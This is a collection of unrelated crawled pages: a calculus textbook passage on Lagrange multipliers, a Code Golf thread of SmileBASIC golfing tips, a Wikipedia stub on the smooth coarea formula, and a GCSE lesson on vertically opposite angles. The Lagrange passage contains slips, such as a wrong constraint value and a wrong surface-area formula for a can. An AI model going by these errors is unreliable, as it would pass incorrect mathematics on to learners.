$$\vrp(t_0)\text{.}$$ We assume that $$\nabla f(x_0,y_0)\neq \vec{0}\text{,}$$ since critical points of $$f$$ have already been checked. We also assume that $$c$$ is a regular value of $$g\text{,}$$ meaning that there are no critical points of $$g$$ along the curve $$g(x,y)=c\text{,}$$ so $$\nabla g(x_0,y_0)\neq\vec{0}$$ as well. But the only way that two non-zero vectors in the plane can both be orthogonal to a third vector is if they're parallel! This means that there must be some scalar $$\lambda$$ such that \begin{equation*} \nabla f(x_0,y_0) = \lambda\nabla g(x_0,y_0)\text{.} \end{equation*} We have demonstrated the following: Note that there are two possibilities: either $$\lambda=0\text{,}$$ in which case $$(x_0,y_0)$$ is a critical point of $$f\text{,}$$ or $$\lambda\neq 0\text{,}$$ in which case the level curve of $$f$$ that passes through $$(x_0,y_0)$$ must be tangent to the curve $$g(x,y)=c$$ at that point. Putting Theorem 14.7.3 to use is a matter of solving a system of equations. ### Key Idea14.7.4.Method of Lagrange Multipliers. To find the maximum and minimum values of a function $$f$$ of two variables subject to a constraint $$g(x,y)=c\text{,}$$ we must find the simultaneous solutions to the following equations, where $$\lambda$$ is an unknown constant (called a Lagrange multiplier): \begin{align*} f_x(x,y) \amp = \lambda g_x(x,y)\\ f_y(x,y) \amp = \lambda g_y(x,y)\\ g(x,y) \amp = c\text{.} \end{align*} ### Example14.7.5.Using Lagrange multipliers. Find the absolute maximum and minimum values of $$f(x,y) = x^2-8x-3y^2$$ on the disc $$x^2+y^2\leq 4\text{.}$$ Solution. This is the same problem as Example 14.7.1, but this time, we will attempt to solve it using the method of Lagrange multipliers. Again, since $$\nabla f(x,y) = \la 2x-8,-6y\ra\text{,}$$ the only critical point for $$f$$ is outside the given disc. It remains to find the maximum and minimum of $$f$$ subject to the constraint $$x^2+y^2=4\text{,}$$ so our constraint function is $$g(x,y)=x^2+y^2\text{.}$$ We have \begin{equation*} \nabla f(x,y) = \la 2x-8, -6y\ra = \lambda \la 2x,2y\ra = \lambda\nabla g(x,y)\text{.} \end{equation*} Together with the constraint, we have three equations: \begin{align*} 2x-8 \amp = 2\lambda x \quad \Rightarrow\, (1-\lambda)x=4\\ -6y \amp = 2\lambda y \quad \Rightarrow\, y=0 \text{ or } \lambda = -3\\ x^2+y^2=4\text{.} \end{align*} Now we encounter the primary difficulty with Lagrange multipliers. While the idea is simple, the equations it leads to frequently are not. The equations are rarely linear, so there is no systematic method for solving them: solving a Lagrange multiplier problem requires a certain amount of patience and creativity! One of the possibilities we see above is $$y=0\text{.}$$ If $$y=0\text{,}$$ the constraint equation requires $$x=\pm 2\text{,}$$ and in either case we can choose a value for $$\lambda$$ ($$-1$$ and $$3\text{,}$$ respectively) that solves the equation $$(1-\lambda)x=4\text{.}$$ We find $$f(2,0)=-12\text{,}$$ and $$f(-2,0)=20\text{.}$$ If $$y\neq 0\text{,}$$ then we must have $$\lambda=-3\text{.}$$ Putting this into the equation $$(1-\lambda)x=4$$ gives us $$4x=4\text{,}$$ or $$x=1\text{.}$$ If $$x=1\text{,}$$ the constraint equation gives us $$1+y^2=4\text{,}$$ so $$y=\pm \sqrt{3}\text{.}$$ We find $$f(1,\sqrt{3})=f(1,-\sqrt{3}) = -16\text{.}$$ There are no other points that satisfy all three equations, so we compare values to complete the problem: the maximum is $$f(-2,0)=20\text{,}$$ and the minimum is $$f(1,\pm\sqrt{3})=-16\text{,}$$ as before. The method of Lagrange multipliers seems rather arcane at first glance, but it's actually not hard to understand geometrically why it works. Consider Figure 14.7.7. The constraint curve $$x^2+y^2=4$$ is the dashed circle. We also see the three level curves (solid) that were obtained as solutions to the Lagrange multiplier equations: • $$f(x,y)=-12\text{:}$$ passing through $$(2,0)$$ • $$f(x,y)=20\text{:}$$ passing through $$(-2,0)$$ • $$f(x,y)=-16\text{:}$$ this curve is actually a pair of lines, $$\sqrt{3}y=\pm (x-4)\text{,}$$ passing through $$(1,\pm\sqrt{3})\text{,}$$ respectively. We see that all three curves are tangent to the constraint curve, as we expect from the requirement that the gradients $$\nabla f$$ and $$\nabla g$$ be parallel where the curves intersect. Additional level curves $$f(x,y)=c$$ are plotted as well, with dashed-dotted lines. For values of $$c$$ with $$c\gt20$$ (greater than the maximum) or $$c\lt-16$$ (less than the minimum), the level curve $$f(x,y)=c$$ does not intersect the constraint curve at all. For values of $$c$$ with $$-16\lt c\lt 20\text{,}$$ the curve $$f(x,y)=c$$ intersects the constraint curve, but the intersection is what's called transversal: at these points of intersection, the two curves are not tangent, and the gradients are not parallel. In Figure 14.7.7, you can imagine that increasing or decreasing the value of $$c$$ has the effect of shifting the level curve one way or the other, until it just touches the circle. Any bigger than the maximum, or smaller than the minimum, and the curves no longer intersect. Of course, saying that the curves “just touch” amounts to saying that they are tangent at their point of intersection, just as Theorem 14.7.3 predicts. ### Example14.7.8.Exploring Lagrange Multipliers Geometrically. Use Lagrange multipliers to locate the extrema of $$f(x,y)=2x^2+y^2\text{,}$$ subject to the constraint $$x+y=3\text{.}$$ Solution. Let's see what happens if we dive right in and apply our machinery. With $$g(x,y)=x+y\text{,}$$ we need to have \begin{equation*} \nabla f(x,y) = \la 4x, 2y\ra = \lambda\la 1,1\ra = \lambda\nabla g(x,y)\text{,} \end{equation*} so $$x+y=4\text{,}$$ from our constraint, and $$4x=\lambda=2y\text{,}$$ giving us $$y=3-x$$ and $$y=2x\text{,}$$ so $$2x=3-x\text{,}$$ giving $$x=1\text{,}$$ and $$y=2\text{.}$$ We get only one solution: the value $$f(1,2)=6\text{.}$$ But is this a maximum or a minimum? And shouldn't we get both? Rather than blindly attacking the equations, perhaps it would do to take a step back and think about the problem. First, consider the constraint equation: $$x+y=3\text{.}$$ This is a line; it certainly is not the boundary of a closed, bounded reason in the plane. Thus, we haven't satisfied the conditions of the Extreme Value Theorem, and have no reason to expect both an absolute maximum and an absolute minimum. Now, since the line $$x+y=3$$ extends without bound, it's clear that there can be no maximum value $$c$$ beyond which the ellipse $$2x^2+y^2=c$$ does not intersect the line. There is, however, a minimum value: when $$c=6\text{,}$$ the ellipse $$2x^2+y^2=6$$ has gradient $$\nabla f(x,y)=\la 4,4\ra\text{,}$$ giving us the tangent line \begin{equation*} 4(x-1)+4(y-2)=0, \text{ or } x+y=3\text{,} \end{equation*} the equation of our constraint. For value of $$c$$ less than 3, the ellipse $$2x^2+y^2=c$$ does not intersect the line $$x+y=3\text{.}$$ The method of Lagrange multipliers is not restricted to functions of two variables or to single constraints. We can similarly determine the extrema of a function $$f$$ of three variables on a closed bounded subset of $$\mathbb{R}^3\text{.}$$ ### Example14.7.10.Determining constrained extrema for a function of three variables. Determine the maximum and minimum values of the function $$f(x,y,z)=x^4+y^4+z^4\text{,}$$ subject to the constraint $$x^2+y^2+z^2=1\text{.}$$ Solution. With $$g(x,y,z)=x^2+y^2+z^2\text{,}$$ the equation $$\nabla f(x,y,z)=\lambda \nabla g(x,y,z)$$ gives us \begin{equation*} \la 4x^3,4y^3,4z^3\ra = \lambda \la 2x, 2y, 2z\ra\text{.} \end{equation*} Equating first components, we have $$2x^3=\lambda x\text{.}$$ One possibility is $$x=0\text{;}$$ the other is $$\lambda = 2x^2\text{.}$$ Similar results hold for the other two variables, leaving us with several possibilities to consider. • We take the solution $$x=0\text{,}$$ $$y=0\text{,}$$ and $$z=0$$ from the vector equation above. But this result cannot satisfy our constraint, so we rule it out. • We have $$x=0$$ and $$y=0\text{,}$$ but $$z\neq 0\text{.}$$ The constraint equation forces $$z=\pm 1\text{.}$$ Similarly, we can have $$x=0\text{,}$$ $$y=\pm 1\text{,}$$ and $$z=0\text{,}$$ or $$x=\pm 1\text{,}$$ $$y=0\text{,}$$ and $$z=0\text{.}$$ This gives us six points, and they all give the same value for $$f\text{:}$$ \begin{equation*} f(\pm 1, 0, 0) = f(0,\pm 1, 0) = f(0, 0, \pm 1)=1\text{.} \end{equation*} • One of the three variables is zero. If $$x=0\text{,}$$ with $$y$$ and $$z$$ nonzero, then we have $$2y^2=\lambda =2z^2\text{,}$$ and since $$x^2+y^2+z^2=1\text{,}$$ we must have $$y^2=z^2=\frac12\text{.}$$ This gives us $$f(x,y,z) = 0+\frac14+\frac14=\frac12\text{.}$$ There are twelve possibilities here: one variable zero, and the other two can be $$\pm \frac{1}{\sqrt{2}}\text{.}$$ Each one gives a value of $$\frac12$$ for $$f\text{.}$$ • Finally, we could have all three variables nonzero. In this case the Lagrange multiplier equations give us \begin{equation*} 2x^2=2y^2=2z^2=\lambda\text{,} \end{equation*} and putting these into the constraint equation gives us $$x^2=y^2=z^2=\frac13\text{.}$$ There are eight different points satisfying this requirement, but all of them give us a value of \begin{equation*} f(x,y,z)=\frac19+\frac19+\frac19=\frac13\text{.} \end{equation*} Comparing values, we see that the maximum value for $$f\text{,}$$ when constrained to unit sphere, is 1, and there are 6 points on the sphere with this value. The minimum value is $$\frac13\text{,}$$ and this occurs at 8 different points. As the above examples show, Lagrange multiplier problems are often easy to set up, but hard to solve by hand. So why is the method useful? One reason is that it can be used to establish useful theoretical results. But more practically, the method of Lagrange multipliers is useful because it is easy to program into a computer: we simply provide the function and the constraint(s), and the computer solves the resulting equations. There is no need for the same degree of problem-solving employed when we first tackled optimization problems in one variable, back in Chapter 4. To emphasize this, we consider one more example: a reprise of one of the optimization problems from Section 4.3. ### Example14.7.11.Solving an optimization problem with Lagrange multipliers. Find the dimensions of a cylindrical can of volume $$206 \text{ in}^3$$ that minimize the can's surface area. Solution. This was one of the exercises at the end of Section 4.3. The surface area of a cylinder of radius $$r$$ and height $$h$$ is given by \begin{equation*} s(r,h) = 2r^2+2\pi rh\text{.} \end{equation*} This is the function we wish to minimize, subject to the volume constraint $$\pi r^2 h = 206\text{.}$$ In Section 4.3, our next step would have been to solve the constraint equation for one of the two variables (likely $$h$$ ) in terms of the other, so we could rewrite $$s(r,h)$$ as a function of one variable and apply the techniques of Section 3.1. Instead, we introduce the constraint function $$v(r,h)= \pi r^2 h\text{.}$$ The Lagrange multiplier equation $$\nabla s = \lambda \nabla v$$ gives us \begin{equation*} \la 4r+2\pi h, 2\pi r\ra = \lambda\la 2\pi r h, \pi r^2\ra\text{.} \end{equation*} Equating the second components gives us $$2\pi r = \lambda\pi r^2\text{.}$$ Since the constraint ensures that $$r\neq 0\text{,}$$ we have $$\lambda r = 2\text{.}$$ Now, we equate the first components: \begin{equation*} 4r+2\pi h = \lambda \cdot 2\pi r\text{,} \end{equation*} but $$\lambda r =2\text{,}$$ so we have simply $$4r+2\pi h = 4\pi h\text{,}$$ or $$\pi h = 2r\text{.}$$ Putting this into the constraint equation gives us \begin{equation*} \pi r^2 h = 2r^2 = 206\text{,} \end{equation*} so $$r=\sqrt[3]{103}\approx 4.688\text{,}$$ and $$h=2\sqrt[3]{103}/\pi \approx 2.984\text{.}$$ This is, of course, the same result you would have found if you did this exercise back in Section 4.3.
2023-03-30 18:01:45
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8268953561782837, "perplexity": 223.34060366126496}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949355.52/warc/CC-MAIN-20230330163823-20230330193823-00335.warc.gz"}
https://codegolf.stackexchange.com/questions/109398/tips-for-golfing-in-smilebasic
# Tips for golfing in SmileBASIC SmileBASIC deserves more attention. I've only seen 3 users here (including myself!) providing SB answers, and while that doesn't surprise me, it disappoints me. It being a paid lang as well as being a BASIC dialect certainly turns people off, but for those who own it it's actually pretty flexible and, surprisingly, golfable. I figured I'd open this tips thread for it and see what comes up. I expect 12Me21 to visit frequently :) # Replace string!="" with string>"" SB allows you to do greater/less comparisons on strings, based on their codepoints. However, the empty string is considered the smallest string there is. So for situations where you do string!="" you can use either string>"" or ""<string, since every string is greater than "" and "" is less than every string. Depending on whether you use < or > depends on if the statement needs whitespace before or after to be valid syntax, which can also save you bytes. For example: WHILE S$!="" can be turned into WHILE S$>"" and further golfed to WHILE""<S$ • All strings are truthy. Even empty ones. – snail_ Feb 7 '17 at 16:34 • Ah, okay. Makes sense. – Riker Feb 7 '17 at 16:36 # Using ?, ., @, and unclosed strings Many dialects of BASIC support ? for printing, and SB is no exception. Having an extremely short text output function is a big advantage. In SmileBASIC, . is evaluated to 0.0, so it can be used in place of 0 to save space. For example: SPSET 0,21 can be SPSET.,21, saving 1 byte. (SPSET0,21 is invalid because SPSET0 could be a user defined function) EXEC. is an extremely short way to make a program loop forever (but it resets all your variables, so it's not always usable) Labels (used for GOTO, GOSUB, and reading DATA) are represented as @LABEL in SmileBASIC. When used in an expression, they are actually treated as strings. For example, BGMPLAY"@305C" can be written as BGMPLAY@305C Strings are automatically closed at the end of a line (or the end of the program). ?"Hello, World!" can be written as ?"Hello, World!. This can also be used to make programs more readable by splitting them into multiple lines without changing the length: ?"Meow"BEEP 69 can be ?"Meow BEEP 69 • Wow, using labels to start MML is insane. Would've never thought of that, though it does limit your character set. – snail_ Feb 7 '17 at 16:46 • Another place I used it was to check if a hexadecimal digit was a number or a letter: @A<POP(H$) is shorter than "@"<POP(H$) (the A doesn't matter, it only ever checks the first character since it will never be the same) – 12Me21 Feb 7 '17 at 16:52 # Use string indexing instead of MID$ The MID$ function is a common function in many BASICs to get a substring from somewhere in the middle of a string. However, if you just need to get the character at some index, using string indexing is far shorter. For example: PRINT MID$("ABC",2,1) PRINT "ABC"[2] Both of these print C. Strings support array-like indexing on a character basis, so if you only need to check one character at a time, this is the best way to do it. • You should talk about how strings can be modified this way. A$=@AA:A$[2]="BD":A$[0]="":A$[2]="C" – 12Me21 Feb 7 '17 at 17:03 • I'll probably write a set of answers about how strings are basically character arrays but even better, because putting it all into one is quite a task. – snail_ Feb 7 '17 at 17:05 • ...or you could write some ;) – snail_ Feb 7 '17 at 17:05 • I'm not very familiar with how it works in other languages. – 12Me21 Feb 7 '17 at 17:07 # When to use : (or not) The : character is used as a statement-breaker in SB. Basically, you use it to stack statements on one line like so: PRINT "HELLO!":PRINT "GOODBYE!" Otherwise, your average statement is broken by a newline: PRINT "HELLO!" PRINT "GOODBYE!" In reality, you often don't need to use the colon at all. So long as statements can be broken into syntactically valid tokens, the parser tends to figure out when one ends and the other starts. The same often goes for whitespace. PRINT"HELLO!"PRINT"GOODBYE!" Of course, this doesn't always work. There are always ambiguous cases and invalid syntaxes where you have to explicitly break statements. Take for example: PRINT "HELLO";END The semicolon means that PRINT is expecting another expression to print out, unless the statement breaks there (we use dangling semicolons to suppress the newline.) Here it assumes END is supposed to be a value, despite being a keyword, and tries to print it, resulting in an error. Thus, we have to explicitly break this statement, be it the colon or the newline. In general, if something seems ambiguous, try it to see if it works. If it doesn't, break the statement. In addition, anything that would produce invalid syntax isn't highlighted correctly as 12Me21 mentioned. # Use the syntax highlighter! SmileBASIC's code editor has a built in syntax highlighter, that can be used to determine whether code will work or not. For example, if you try to do BEEP0, it will not highlight it, because there needs to be a space between a function and a digit. However BEEP. works, because . is not a digit. Normally code like X=7BEEP is valid, since functions can't start with a number, so SB assumes that 7 and BEEP are separate. However. X=7END is NOT allowed (and not highlighted), because it tries to interpret 7E... as a number, but since there's no digit after the E, it fails, causing an error. Normally this would be pretty hard to figure out, but with a very reliable syntax highlighter, it's much easier to tell what you can and can't do. My SmileBASIC syntax highlighter is designed to (hopefully) perfectly match the behavior of SB, so you can use it to check if code is valid. <!DOCTYPE html> <html> <meta charset="utf-8"> <script src="https://12Me21.github.io/sbhighlight3/sbhighlight.js"></script> <script> function update(event){ $code.textContent=$input.innerText; //must be innerText since contentedible and textContent are too dumb to understand linebreaks //contenteditable adds <br>s which textContent ignores //whyyyyy applySyntaxHighlighting($code,true); } function setCaretPosition(elem,caretPos){ if(elem){ if(elem.createTextRange) { var range=elem.createTextRange(); range.move('character',caretPos); range.select(); }else{ if(elem.selectionStart){ elem.focus(); elem.setSelectionRange(caretPos,caretPos); }else elem.focus(); } } } </script> <style> #editcontainer{ position: absolute; } #editcontainer>pre{ position: absolute; left: 0; top: 0; } pre.csssucks *{ color:transparent !important; background-color:transparent !important; caret-color: white; } pre.csssucks { color:transparent !important; background-color:transparent !important; caret-color: white; border-color:transparent; padding-right: 50ch; } </style> </head> <body> Use SB font:<input type="checkbox" autocomplete="off" onchange="$code.dataset.sbfont=$input.dataset.sbfont=this.checked;update()"></input> <button onclick="update()">force update</button> <hr> <div id="editcontainer"> <pre id="$code">test</pre> <pre id="\$input" class="csssucks" contenteditable="true" spellcheck="false" onkeydown="setTimeout(function(){update(event)},2);">test</pre> </div> </body> </html> # Avoid the MOD operator The modulus operator is really long, and should be avoided if possible. If you're getting characters from a string, you can just repeat the string instead: "ABC"[X MOD 3] ("ABC"*9)[X] (assuming X will always be less than 27) Sometimes you can save 1 character with AND instead: X MOD 4 3AND X # Omitting OUT return values An OUT form function is one with multiple returns; you specify the variables to accept the return values after the OUT keyword. An example using DTREAD: DTREAD OUT yearVar,monthVar,dayVar But what if you only want one of the values, like the current month? You can "ignore" the rest of the values by simply not writing any variable name to accept them! You do, however, have to leave in the commas (aside from the occasional optional return.) DTREAD OUT ,monthVar, Which can be further golfed to DTREAD OUT,M,
2019-01-18 15:48:26
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3798160254955292, "perplexity": 1900.447369097701}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547583660175.18/warc/CC-MAIN-20190118151716-20190118173716-00029.warc.gz"}
https://en.wikipedia.org/wiki/Smooth_coarea_formula
# Smooth coarea formula In Riemannian geometry, the smooth coarea formulas relate integrals over the domain of certain mappings with integrals over their codomains. Let ${\displaystyle \scriptstyle M,\,N}$ be smooth Riemannian manifolds of respective dimensions ${\displaystyle \scriptstyle m\,\geq \,n}$. Let ${\displaystyle \scriptstyle F:M\,\longrightarrow \,N}$ be a smooth surjection such that the pushforward (differential) of ${\displaystyle \scriptstyle F}$ is surjective almost everywhere. Let ${\displaystyle \scriptstyle \varphi :M\,\longrightarrow \,[0,\infty ]}$ a measurable function. Then, the following two equalities hold: ${\displaystyle \int _{x\in M}\varphi (x)\,dM=\int _{y\in N}\int _{x\in F^{-1}(y)}\varphi (x){\frac {1}{N\!J\;F(x)}}\,dF^{-1}(y)\,dN}$ ${\displaystyle \int _{x\in M}\varphi (x)N\!J\;F(x)\,dM=\int _{y\in N}\int _{x\in F^{-1}(y)}\varphi (x)\,dF^{-1}(y)\,dN}$ where ${\displaystyle \scriptstyle N\!J\;F(x)}$ is the normal Jacobian of ${\displaystyle \scriptstyle F}$, i.e. the determinant of the derivative restricted to the orthogonal complement of its kernel. Note that from Sard's lemma almost every point ${\displaystyle \scriptstyle y\,\in \,N}$ is a regular point of ${\displaystyle \scriptstyle F}$ and hence the set ${\displaystyle \scriptstyle F^{-1}(y)}$ is a Riemannian submanifold of ${\displaystyle \scriptstyle M}$, so the integrals in the right-hand side of the formulas above make sense. ## References • Chavel, Isaac (2006) Riemannian Geometry. A Modern Introduction. Second Edition.
2017-08-16 18:05:24
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 13, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9858016967773438, "perplexity": 310.6996701141781}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886102309.55/warc/CC-MAIN-20170816170516-20170816190516-00217.warc.gz"}
https://thirdspacelearning.com/gcse-maths/geometry-and-measure/vertically-opposite-angles/
GCSE Maths Geometry and Measure Angles Vertically Opposite Angles # Vertically Opposite Angles Here we will learn about vertically opposite angles including how to find missing angles which are vertically opposite each other at the same vertex. There are also angles in polygons worksheets based on Edexcel, AQA and OCR GCSE exam style questions, along with further guidance on where to go next if you’re still stuck. ## What are vertically opposite angles? Vertically opposite angles are angles that are opposite one another at a specific vertex and are created by two straight intersecting lines Vertically opposite angles are equal to each other. These are sometimes called vertical angles. Here the two angles labelled ‘a’ are equal to one another because they are ‘vertically opposite’ at the same vertex. This also applies to the angles labelled ‘b’ You can try out the above rule by drawing two crossing lines and measuring the angles opposite to one another. You will also notice that angle ‘a’ and ‘b’ lie on a straight line and are therefore equal to 180 degrees when added together. See below: Note because the sum of angles ‘a’ and ‘b’ are 180º we can call them supplementary angles. Before we start looking at specific examples it is important we are familiar with some key words, terminology and symbols required for this topic. ### Keywords • Angle: defined as the amount of turn around a common vertex. • Vertex: the point created by two line segments meeting (plural is vertices) • How to label an angle: We normally label angles in two main ways: 1By giving the angle a ‘name’ which is normally a lower case letter such as a, x or y or the greek letter ϴ (theta). 2By referring to the angle as the three letters that define the angle. The middle letter refers to the vertex at which the angle is e.g. see the diagram for the angle we call ABC: • Angles on a straight line equal 180º: Angles on one part of a straight line always add up to 180º. See the diagram for an example where angles a and b are equal to 180º: However see the next diagram for an example of where a and b do not equal 180º because they are not on one single part of a straight line, i.e. they do not share a vertex and are not adjacent to one another. Note – you can try out the above rule by drawing out the above diagrams and measuring the angles using a protractor. • Angles around a point equal 360º: Angles around a point will always equal 360º. See the diagram for an example where angles a, b and c are equal to 360º • Supplementary and Complementary Angles: Two angles are supplementary when they add up to 180º, they do not have to be next to each other (see below on ). Two angles are complementary  when they add up to 90º, they do not have to be next to each other (see the diagram). ## How to solve vertically opposite angles problems In order to solve problems involving angles you should follow these steps: 1. Identify which angles are vertically opposite to one another. Write this down e.g. a = b. 2. Clearly identity which of the unknown angles the question is asking you to find the value of. 3. Solve the problem and give reasons where applicable. 4. Clearly state the answer using angle terminology. ## Vertically opposite angles examples ### Example 1: two angles that are vertically opposite Find the value of angle x. 1. Identify which angles are vertically opposite to one another. The angle labelled x and the angle with value 117º are vertically opposite to one another at the point where the two lines cross. 2 Clearly identify which of the unknown angles the question is asking you to find the value of. The angle labelled x. 3 Solve the problem and give reasons where applicable. x = 117 because the angles are vertically opposite to one another. 4 Clearly state the answer using angle terminology. x = 117º ### Example 2: two angles that are vertically opposite Find the values of angles x and y. The angle labelled x and the angle with value 93º are vertically opposite to one another. The angles labelled x and y. You will notice that x and y are not vertically opposite one another. x = 93 because the angles are vertically opposite to one another. \begin{aligned} x+y &= 180 \hspace{3cm} \text{because they are on a straight line at the same vertex}\\\\ 93+y &= 180 \hspace{3cm} \text{subtract 93 from each side} \\\\ y&=87 \end{aligned} x = 93º, y = 87º ### Example 3: finding all the angles around a point with vertically opposite angles Find the values of the angles labelled a, b and c. The angle labelled a and the angle with value 22º are vertically opposite to one another. The angle labelled b and the angle labelled c are vertically opposite to one another. The angles labelled a, b and c. a = 22 because the angles are vertically opposite to one another. \begin{aligned} a+b &= 180 \hspace{2cm} & \text{because they are on a straight line at the same vertex}\\\\ 22+b &= 180 & \text{subtract 22 from each side} \\\\ b&=158 \end{aligned} c = b because the angles are vertically opposite to one another. c = 158 a = 22º, b = 158º, c = 158º ### Example 4: vertically opposite angles with algebra Using vertically opposite angles find the value of x. The angle labelled ‘x + 10’ is vertically opposite an angle the other side of the vertex (see below). The angle labelled ‘x + 120’ is vertically opposite an angle the other side of the vertex (see below.) We are not being asked to find an angle we are being asked to find the value of x. The four angles total 360º because they are all around a vertex. Therefore: \begin{aligned} x+10+x+120+x+10+x+120 &= 360 \hspace{.5cm} & \text{simplify the equation}\\\\ 4x+260 &= 360 & \text{subtract 260 from each side} \\\\ 4x&=100 & \text{divide each side by 4} \\\\ x&=25 \end{aligned} x = 25º ### Example 5: problem solving In the diagram below ACD is a straight line: AB = AC Find the value of angle BAC. The angle of size 80º is vertically opposite angle BCA. Find angle BAC at the top vertex of the triangle. ACB = 80º because the angles are vertically opposite one another. ABC = ACB because triangle ABC is a isosceles triangle, therefore ABC = 80º. Angle BAC + ABC + ACB = 180 because they are three interior angles of the triangle. \begin{aligned} B A C+80+80&=180 \\\\ BAC+160&=180 \\\\ BAC&=20 \end{aligned} Angle BAC = 20º ### Example 6: worded problem Two angles with values of x + 30 and 4x − 30 are vertically opposite one another. Prove the two angles are both 50º. The angles labelled x + 30 and 4x − 30  vertically opposite to one another meaning they are equal to one another. You are being asked to prove the size of each angle is 50º . This means show all your working to reach this conclusion. \begin{aligned} x+30&=4x-30 \hspace{.25cm} & \text{because the angles are vertically opposite to one another}\\\\ x+60&=4x & \text{add 30 to both sides} \\\\ 60 &=3x & \text{subtract x from each side} \\\\ 20 &=x & \text{divide each side by 3} \end{aligned} Therefore the size of the two angles can be found by substitution x = 20 into each angle: Angle 1: \begin{aligned} x+30&=20+30\\\\ x&=50^{\circ} \end{aligned} Angle 2: \begin{aligned} 4x-30&=4(20)-30\\\\ x&=50^{\circ} \end{aligned} Therefore both angles are 50º. ### Common misconceptions • Incorrectly labelling angles which are vertically opposite one another • Misuse of the ‘straight line’ rule where angles do not share a vertex • Finding the incorrect angle due to misunderstanding the terminology ### Practice vertically opposite angles questions 1.  Find the value of the angle labelled x : x=113 x=23 x=67 x=22 Angle x is vertically opposite the given angle of 67^{\circ}  so it is the same. 2.  Find the value of the angle labelled x : x=146 x=56 x=34 x=214 Angle x is vertically opposite the given angle of 146^{\circ} so it is the same. 3.  Find the value of the angle labelled x : x=72 x=86 x=82 x=98 Angle x is vertically opposite the given angle of 98^{\circ} so it is the same. 4.  Find the value of the angle labelled x and  y : x=68,  y=68 x=112,  y=112 x=112,  y=68 x=68,  y=112 Angle x is vertically opposite the given angle of 112^{\circ} so it is the same. Angle x and angle y lie on a straight line so they must add up to 180 . 5. Two angles with values of 2x and 50^{\circ} are vertically opposite one another. Find the value of x . x=50 x=25 x=100 x=75 Angle 2x is vertically opposite the given angle of 50^{\circ} so it is the same. To solve for x , we divide 50 by 2 . 6. Two angles with values of 6x+10 and 10x-70 are vertically opposite one another. Find the value of x x=20 x=40 x=70 x=10 Angle 6x + 10 is vertically opposite angle of 10x  −  70 so they are the same. Solving the equation, 6x + 10 = 10x  −  70 , leads to the correct value for x . ### Vertically opposite angles GCSE exam questions 1.  Find the size of angles a and b . (2 marks) a = 142^{\circ} (because vertically opposite angles are equal) (1) b: 180 − 142 = 38^{\circ} (because angles on a straight line add to 180) (1) a = 142^{\circ}, b = 38^{\circ} 2. (a)  Write an equation involving x. (b)  Use your equation to find the size of the angles. (4 marks) (a) 2x + 14 = 3x  −  5 (1) (b) 14 = x  −  5 (1) x = 19 (1) Angles: 2 \times 19 + 14 = 52 = 52^{\circ} (1) 3.  Prove that triangle ABC  is a right angle triangle (3 marks) Angle  ACB = 24^{\circ} since they are vertically opposite (1) 66 + 24 = 90 (1) 180  −  90 = 90  (angles in a triangle add up to 180 ), so angle BAC is 90^{\circ} and this is a right angle triangle. (1) ## Learning checklist You have now learned how to: • Use conventional terms and notation for angles • Apply the properties of vertically opposite angles • Apply angle facts and properties to solve problems ## Still stuck? Prepare your KS4 students for maths GCSEs success with Third Space Learning. Weekly online one to one GCSE maths revision lessons delivered by expert maths tutors. Find out more about our GCSE maths revision programme.
2021-09-21 05:23:48
